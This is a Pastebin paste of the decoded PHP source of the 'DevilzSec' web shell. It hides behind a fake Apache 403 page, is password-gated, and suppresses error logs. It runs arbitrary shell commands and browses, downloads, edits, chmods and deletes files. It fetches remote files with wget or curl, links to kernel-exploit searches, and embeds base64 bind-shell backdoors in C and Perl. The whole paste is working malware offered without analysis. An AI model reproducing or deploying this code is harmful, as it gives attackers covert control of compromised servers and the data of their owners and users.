LelakiBesi

DevilzSec Shell leaked & decoded

Dec 12th, 2013
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 114.45 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('display_errors',0);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @set_time_limit(0);
  9. @set_magic_quotes_runtime(0);
  10. $xName='DevilzSec';
  11. $auth_pass= 'dcb76da384ae3028d6aa9b2ebcea01c9';
  12. $xSoftware = trim(getenv('SERVER_SOFTWARE'));
  13. $xServerName = $_SERVER['HTTP_HOST'];
  14. $release = @php_uname('r');
  15. $kernel = @php_uname('s');
  16. $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
  17. if(strpos('Linux',$kernel) !== false)
  18. $explink .= urlencode('Linux Kernel '.substr($release,0,6));
  19. else
  20. $explink .= urlencode($kernel .' '.substr($release,0,3));
  21. $release1 = @php_uname('r');
  22. $kernel1 = @php_uname('s');
  23. $explink1 = 'http://www.google.com/search?q=';
  24. if(strpos('Linux',$kernel) !== false)
  25. $explink1 .= urlencode('Linux Kernel '.substr($release1,0,6));
  26. else
  27. $explink1 .= urlencode($kernel1 .' '.substr($release1,0,3));
  28. function printLogin() {
  29. echo "<title>403 Forbidden</title>
  30. <h1>Forbidden</h1>
  31. <p>You don't have permission to access this file on this server.</p>
  32. <hr>
  33. <address>Apache Server at ".$_SERVER['HTTP_HOST'].' Port 80</address>
  34. <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
  35. <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><form method=post><input type=password name=pass></form>';
  36. exit;
  37. }
  38. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  39. if( empty( $auth_pass ) ||
  40. ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
  41. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  42. else
  43. printLogin();
  44. elseif(isset($_GET['dl']) &&($_GET['dl'] != ''))
  45. {
  46. $file = $_GET['dl'];
  47. $filez = @file_get_contents($file);
  48. header('Content-type: application/octet-stream');
  49. header('Content-length: '.strlen($filez));
  50. header("Content-disposition: attachment;
  51. filename=\"".basename($file)."\";");
  52. echo $filez;
  53. exit;
  54. }
  55. elseif(isset($_GET['dlgzip']) &&($_GET['dlgzip'] != ''))
  56. {
  57. $file = $_GET['dlgzip'];
  58. $filez = gzencode(@file_get_contents($file));
  59. header("Content-Type:application/x-gzip\n");
  60. header('Content-length: '.strlen($filez));
  61. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  62. echo $filez;exit;
  63. }
  64. if(isset($_GET['img']))
  65. {
  66. @ob_clean();
  67. $d = magicboom($_GET['y']);
  68. $f = $_GET['img'];
  69. $inf = @getimagesize($d.$f);
  70. $ext = explode($f,'.');
  71. $ext = $ext[count($ext)-1];
  72. @header('Content-type: '.$inf['mime']);
  73. @header('Cache-control: public');
  74. @header('Expires: '.date('r',mktime(0,0,0,1,1,2030)));
  75. @header('Cache-control: max-age='.(60*60*24*7));
  76. @readfile($d.$f);
  77. exit;
  78. }
  79. $software = getenv('SERVER_SOFTWARE');
  80. if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') $safemode = TRUE;
  81. else $safemode = FALSE;
  82. $system = @php_uname();
  83. if(strtolower(substr($system,0,3)) == 'win') $win = TRUE;
  84. else $win = FALSE;
  85. if(isset($_GET['y']))
  86. {if(@is_dir($_GET['view'])){$pwd = $_GET['view'];@chdir($pwd);}else{$pwd = $_GET['y'];@chdir($pwd);}}
  87. if(!$win)
  88. {if(!$user = rapih(exe('whoami'))) $user = '';if(!$id = rapih(exe('id'))) $id = '';$prompt = $user." \$ ";$pwd = @getcwd().DIRECTORY_SEPARATOR;}
  89. else
  90. {
  91. $user = @get_current_user();
  92. $id = $user;
  93. $prompt = $user.' &gt;';
  94. $pwd = realpath('.')."\\";
  95. $v = explode("\\",$d);
  96. $v = $v[0];
  97. foreach (range('A','Z') as $letter)
  98. {
  99. $bool = @is_dir($letter.":\\");
  100. if ($bool)
  101. {
  102. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  103. if ($letter.':'!= $v) {$letters .= $letter;}
  104. else {$letters .= "<span class=\"gaya\">".$letter.'</span>';}
  105. $letters .= ' ]</a> ';
  106. }
  107. }
  108. }
  109. $disablefunc = @ini_get('disable_functions');
  110. function showdisablefunctions() {
  111. if ($disablefunc=@ini_get('disable_functions')){return "<span class='on'>".$disablefunc.'</span>';}
  112. else {return "<span class='off'>NONE</span>";}
  113. }
  114. function ex($cfe) {
  115. $res = '';
  116. if (!empty($cfe)) {
  117. if(function_exists('exec')) {
  118. @exec($cfe,$res);
  119. $res = join("\n",$res);
  120. }elseif(function_exists('shell_exec')) {
  121. $res = @shell_exec($cfe);
  122. }elseif(function_exists('system')) {
  123. @ob_start();
  124. @system($cfe);
  125. $res = @ob_get_contents();
  126. @ob_end_clean();
  127. }elseif(function_exists('passthru')) {
  128. @ob_start();
  129. @passthru($cfe);
  130. $res = @ob_get_contents();
  131. @ob_end_clean();
  132. }elseif(@is_resource($f = @popen($cfe,'r'))) {
  133. $res = '';
  134. while(!@feof($f)) {$res .= @fread($f,1024);}
  135. @pclose($f);
  136. }else {$res = 'Ex() Disabled!';}
  137. }
  138. return $res;
  139. }
  140. function openBaseDir()
  141. {
  142. $openBaseDir = ini_get('open_basedir');
  143. if (!$openBaseDir){$openBaseDir = '<span class="off">OFF</span>';}
  144. else {$openBaseDir = '<span class="on">ON</span>';}
  145. return $openBaseDir;
  146. }
  147. function testperl() {
  148. if (ex('perl -h')) {$perl='<span class="on">ON</span>';}
  149. else {$perl= '<span class="off">OFF</span>';}return $perl;
  150. }
  151. function testfetch() {
  152. if (ex('fetch --help')) {$fetch='<span class="on">ON</span>';}
  153. else {$fetch= '<span class="off">OFF</span>';}return $fetch;
  154. }
  155. function testwget() {
  156. if (ex('wget --help')) {$wget= '<span class="on">ON</span>';}
  157. else {$wget= '<span class="off">OFF</span>';}return $wget;
  158. }
  159. function testoracle() {
  160. if(function_exists('ocilogon')){$oracle = '<span class="on">ON</span>';}
  161. else {$oracle = '<span class="off">OFF</span>';}return $oracle;
  162. }
  163. function testpostgresql() {
  164. if (function_exists('pg_connect')){$postgreSQL = '<span class="on">ON</span>';}
  165. else {$postgreSQL = '<span class="off">OFF</span>';}return $postgreSQL;
  166. }
  167. function testmssql() {
  168. if (function_exists('mssql_connect')){$msSQL = '<span class="on">ON</span>';}
  169. else {$msSQL = '<span class="off">OFF</span>';}return $msSQL;
  170. }
  171. function testcurl() {
  172. if (extension_loaded('curl')){$curl = '<span class="on">ON</span>';}
  173. else{$curl = '<span class="off">OFF</span>';}return $curl;
  174. }
  175. function testmysql() {
  176. $mysql_try = function_exists('mysql_connect');
  177. if ($mysql_try){$mysql = '<span class="on">ON</span>';}
  178. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  179. }
  180. $quotes = get_magic_quotes_gpc();
  181. if ($quotes == '1'or $quotes == 'on')
  182. {
  183. $quot = '<span class="on">ON</span>';
  184. }
  185. else
  186. {
  187. $quot = '<span class="off">OFF</span>';
  188. }
  189. if(function_exists('posix_getpwuid') &&function_exists('posix_getgrgid')) $posix = TRUE;
  190. else $posix = FALSE;
  191. $bytes = disk_free_space('.');
  192. $si_prefix = array( 'B','KB','MB','GB','TB','EB','ZB','YB');
  193. $base = 1024;
  194. $class = min((int)log($bytes ,$base) ,count($si_prefix) -1);
  195. $totalspace_bytes = disk_total_space('.');
  196. $totalspace_si_prefixs = array( 'B','KB','MB','GB','TB','EB','ZB','YB');
  197. $totalspace_bases = 1024;
  198. $totalspace_class = min((int)log($totalspace_bytes ,$totalspace_bases) ,count($totalspace_si_prefixs) -1);
  199. $totalspace_show = sprintf('%1.2f',$totalspace_bytes / pow($totalspace_bases,$totalspace_class)) .' '.$totalspace_si_prefixs[$totalspace_class] .'';
  200. $freespace_show = sprintf('%1.2f',$bytes / pow($base,$class)) .' '.$si_prefix[$class] .'';
  201. $server_ip = @gethostbyname($_SERVER['HTTP_HOST']);
  202. $my_ip = $_SERVER['REMOTE_ADDR'];
  203. $bindport = '443';
  204. $bindport_pass = 'CyberSEC';
  205. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  206. $pwdurl = '';
  207. for($i = 0 ;$i <sizeof($pwds)-1 ;$i++)
  208. {
  209. $pathz = '';
  210. for($j = 0 ;$j <= $i ;$j++)
  211. {
  212. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  213. }
  214. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i].' '.DIRECTORY_SEPARATOR.' </a>';
  215. }
  216. if(isset($_POST['rename'])){
  217. $old = $_POST['oldname'];
  218. $new = $_POST['newname'];
  219. @rename($pwd.$old,$pwd.$new);
  220. $file = $pwd.$new;
  221. }
  222. if(isset($_POST['chmod'])){
  223. $name = $_POST['name'];
  224. $value = $_POST['newvalue'];
  225. if (strlen($value)==3){
  226. $value = 0 .''.$value;
  227. }
  228. @chmod($pwd.$name,octdec($value));
  229. $file = $pwd.$name;
  230. }
  231. if(isset($_POST['chmod_folder'])){
  232. $name = $_POST['name'];
  233. $value = $_POST['newvalue'];
  234. if (strlen($value)==3){
  235. $value = 0 .''.$value;
  236. }
  237. @chmod($pwd.$name,octdec($value));
  238. $file = $pwd.$name;
  239. }
  240. $buff =$software.'<br />';
  241. $buff .=$system.' <a href='.$explink .' target=_blank>[Exploit-db.com]</a><a href='.$explink1 .' target=_blank>[Google]</a><br />';
  242. if($id != '')
  243. $buff .= $id.'<br />';
  244. $buff .='Php : '.@phpversion()." <span class=\"gaya\">|</span> <a href=\"?y=".$pwd."&amp;x=phpinfo\">[ phpinfo ]</a><br/>";
  245. $buff .= 'Server Ip : <span class=off>'.$server_ip."</span> <span class=\"gaya\">|</span> Your Ip : <span class=off>".$my_ip."</span></span><span class=\"gaya\">|</span> <a href=http://zone-h.org/archive/ip=".$server_ip.'>[ Bing ]</a></span> <a href=http://zone-h.org/archive/ip='.$server_ip.'>[ Zone-H ]</a><br />';
  246. $buff .= 'Total HDD Space : '."<span class=off>$totalspace_show</span>"." <font><span class=\"gaya\">|</span></font> ".'Free HDD Space : '."<span class=off>$freespace_show</span>".'<br />';
  247. $buff .= "Magic Quotes: $quot".'<br>';
  248. $buff .= 'Disabled Functions : '.showdisablefunctions().'<br>';
  249. $buff .= 'MySQL: '.testmysql().' MSSQL: '.testmssql().' Oracle: '.testoracle().' MSSQL: '.testmssql().' PostgreSQL: '.testpostgresql().' cURL: '.testcurl().' WGet: '.testwget().' Fetch: '.testfetch().' Perl: '.testperl().' Open Basedir: '.openBaseDir().'<br>';
  250. if($safemode) $buff .= 'safemode <span class="on">ON</span>';
  251. else $buff .= 'Safemode : <span class="off">ON</span><br>';
  252. $buff .= $letters.'&nbsp;&gt;&nbsp;'.$pwdurl;
  253. function rapih($text){return trim(str_replace('<br />','',$text));}
  254. function magicboom($text){if (!get_magic_quotes_gpc()) {return $text;}return stripslashes($text);}
  255. function showdir($pwd,$prompt)
  256. {
  257. $fname = array();
  258. $dname = array();
  259. if(function_exists('posix_getpwuid') &&function_exists('posix_getgrgid')) $posix = TRUE;
  260. else $posix = FALSE;
  261. $user = '????:????';
  262. if($dh = opendir($pwd))
  263. {
  264. while($file = readdir($dh))
  265. {
  266. if(is_dir($file))
  267. {$dname[] = $file;}
  268. elseif(is_file($file))
  269. {$fname[] = $file;}
  270. }
  271. closedir($dh);
  272. }
  273. sort($fname);
  274. sort($dname);
  275. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  276. $tree = @sizeof($path);
  277. $parent = '';
  278. $buff ="<br>
  279. <table class=\"explore\">
  280. <tr>
  281. <th>name</th>
  282. <th style=\"width:60px;\">Size</th>
  283. <th style=\"width:200px;\">Owner:Group</th>
  284. <th style=\"width:80px;\">Permission</th>
  285. <th style=\"width:110px;\">Modified</th>
  286. <th style=\"width:190px;\">Actions</th>
  287. </tr> ";
  288. if($tree >2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  289. else $parent = $pwd;
  290. foreach($dname as $folder)
  291. {
  292. if($folder == '.')
  293. {
  294. if(!$win &&$posix)
  295. {
  296. $name=@posix_getpwuid(@fileowner($folder));
  297. $group=@posix_getgrgid(@filegroup($folder));
  298. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  299. }
  300. else {$owner = $user;}
  301. $buff .= "<tr>
  302. <td><a href=\"?y=".$pwd."\">$folder</a></td>
  303. <td>-</td>
  304. <td style=\"text-align:center;\">".$owner.'</td>
  305. <td><center>'.get_perms($pwd)."</center></td>
  306. <td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($pwd))."</td>
  307. <td><span id=\"titik1\">
  308. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  309. | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  310. </span>
  311. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  312. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  313. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  314. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  315. </form>
  316. </td>
  317. </tr> ";
  318. }
  319. elseif($folder == '..')
  320. {
  321. if(!$win &&$posix)
  322. {
  323. $name=@posix_getpwuid(@fileowner($folder));
  324. $group=@posix_getgrgid(@filegroup($folder));
  325. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  326. }
  327. else {$owner = $user;}
  328. $buff .= "<tr>
  329. <td>
  330. <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' /> $folder</a></td>
  331. <td>-</td>
  332. <td style=\"text-align:center;\">".$owner.'</td>
  333. <td><center>'.get_perms($parent)."</center></td>
  334. <td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($parent))."</td>
  335. <td><span id=\"titik2\">
  336. <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  337. | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  338. </span>
  339. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  340. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  341. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  342. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  343. </form>
  344. </td>
  345. </tr>";
  346. }
  347. else
  348. {
  349. if(!$win &&$posix)
  350. {
  351. $name=@posix_getpwuid(@fileowner($folder));
  352. $group=@posix_getgrgid(@filegroup($folder));
  353. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  354. }
  355. else {$owner = $user;}
  356. $buff .= "<tr>
  357. <td>
  358. <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=' /> [ $folder ]</a>
  359. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  360. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  361. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  362. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  363. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  364. onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  365. </form>
  366. </td>
  367. <td>DIR</td>
  368. <td style=\"text-align:center;\">".$owner."</td>
  369. <td><center>
  370. <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  371. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  372. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  373. <input class=\"inputz\" style=\"width:50px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($pwd.$folder)),-4)."\" />
  374. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  375. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  376. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
  377. </form>
  378. </center></td>
  379. <td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($folder))."</td>
  380. <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  381. | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  382. </td>
  383. </tr>";
  384. }
  385. }
  386. foreach($fname as $file)
  387. {
  388. $full = $pwd.$file;
  389. if(!$win &&$posix)
  390. {
  391. $name=@posix_getpwuid(@fileowner($file));
  392. $group=@posix_getgrgid(@filegroup($file));
  393. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  394. }
  395. else {$owner = $user;}
  396. $buff .= "<tr>
  397. <td>
  398. <a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC' /> $file</a>
  399. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  400. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  401. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  402. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  403. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  404. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  405. </form>
  406. </td>
  407. <td>".ukuran($full)."</td>
  408. <td style=\"text-align:center;\">".$owner."</td>
  409. <td><center>
  410. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  411. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  412. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  413. <input class=\"inputz\" style=\"width:50px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($full)),-4)."\" />
  414. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  415. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  416. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  417. </form></center></td>
  418. <td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($full))."</td>
  419. <td>
  420. <a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  421. | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  422. | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  423. | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  424. </td>
  425. </tr>";
  426. }
  427. $buff .= '</table>';return $buff;
  428. }
  429. function ukuran($file)
  430. {
  431. if($size = @filesize($file))
  432. {
  433. if($size <= 1024) return $size;
  434. else
  435. {
  436. if($size <= 1024*1024)
  437. {$size = @round($size / 1024,2);;return "$size kb";}
  438. else {$size = @round($size / 1024 / 1024,2);return "$size mb";}
  439. }
  440. }
  441. else return '???';
  442. }
  443. function exe($cmd)
  444. {
  445. if(function_exists('system'))
  446. {
  447. @ob_start();
  448. @system($cmd);
  449. $buff = @ob_get_contents();
  450. @ob_end_clean();
  451. return $buff;
  452. }
  453. elseif(function_exists('exec'))
  454. {
  455. @exec($cmd,$results);
  456. $buff = '';
  457. foreach($results as $result)
  458. {$buff .= $result;}
  459. return $buff;
  460. }
  461. elseif(function_exists('passthru'))
  462. {
  463. @ob_start();
  464. @passthru($cmd);
  465. $buff = @ob_get_contents();
  466. @ob_end_clean();
  467. return $buff;
  468. }
  469. elseif(function_exists('shell_exec'))
  470. {
  471. $buff = @shell_exec($cmd);
  472. return $buff;
  473. }
  474. }
  475. function tulis($file,$text)
  476. {
  477. $textz = gzinflate(base64_decode($text));
  478. if($filez = @fopen($file,'w'))
  479. {
  480. @fputs($filez,$textz);
  481. @fclose($file);
  482. }
  483. }
  484. function tulis_2($file,$text)
  485. {
  486. $textz = base64_decode($text);
  487. if($filez = @fopen($file,'w'))
  488. {
  489. @fputs($filez,$textz);
  490. @fclose($file);
  491. }
  492. }
  493. function ambil($link,$file)
  494. {
  495. if($fp = @fopen($link,'r'))
  496. {
  497. while(!feof($fp))
  498. {
  499. $cont.= @fread($fp,1024);
  500. }
  501. @fclose($fp);
  502. $fp2 = @fopen($file,'w');
  503. @fwrite($fp2,$cont);
  504. @fclose($fp2);
  505. }
  506. }
  507. function which($pr)
  508. {
  509. $path = exe("which $pr");
  510. if(!empty($path))
  511. {return trim($path);}
  512. else {return trim($pr);}
  513. }
  514. function download($cmd,$url)
  515. {
  516. $namafile = basename($url);
  517. switch($cmd)
  518. {
  519. case 'wwget': exe(which('wget').' '.$url.' -O '.$namafile);break;
  520. case 'wlynx': exe(which('lynx').' -source '.$url.' > '.$namafile);break;
  521. case 'wfread': ambil($wurl,$namafile);break;
  522. case 'wfetch': exe(which('fetch').' -o '.$namafile.' -p '.$url);break;
  523. case 'wlinks': exe(which('links').' -source '.$url.' > '.$namafile);break;
  524. case 'wget': exe(which('GET').' '.$url.' > '.$namafile);break;
  525. case 'wcurl': exe(which('curl').' '.$url.' -o '.$namafile);break;
  526. default: break;}
  527. return $namafile;
  528. }
  529. function get_perms($file)
  530. {
  531. if($mode=@fileperms($file))
  532. {
  533. $perms='';
  534. $perms .= ($mode &00400) ?'r': '-';
  535. $perms .= ($mode &00200) ?'w': '-';
  536. $perms .= ($mode &00100) ?'x': '-';
  537. $perms .= ($mode &00040) ?'r': '-';
  538. $perms .= ($mode &00020) ?'w': '-';
  539. $perms .= ($mode &00010) ?'x': '-';
  540. $perms .= ($mode &00004) ?'r': '-';
  541. $perms .= ($mode &00002) ?'w': '-';
  542. $perms .= ($mode &00001) ?'x': '-';
  543. return $perms;
  544. }
  545. else return '??????????';
  546. }
  547. function clearspace($text){return str_replace(' ','_',$text);}
  548. $port_bind_bd_c='bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf';
  549. $port_bind_bd_pl='ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=';
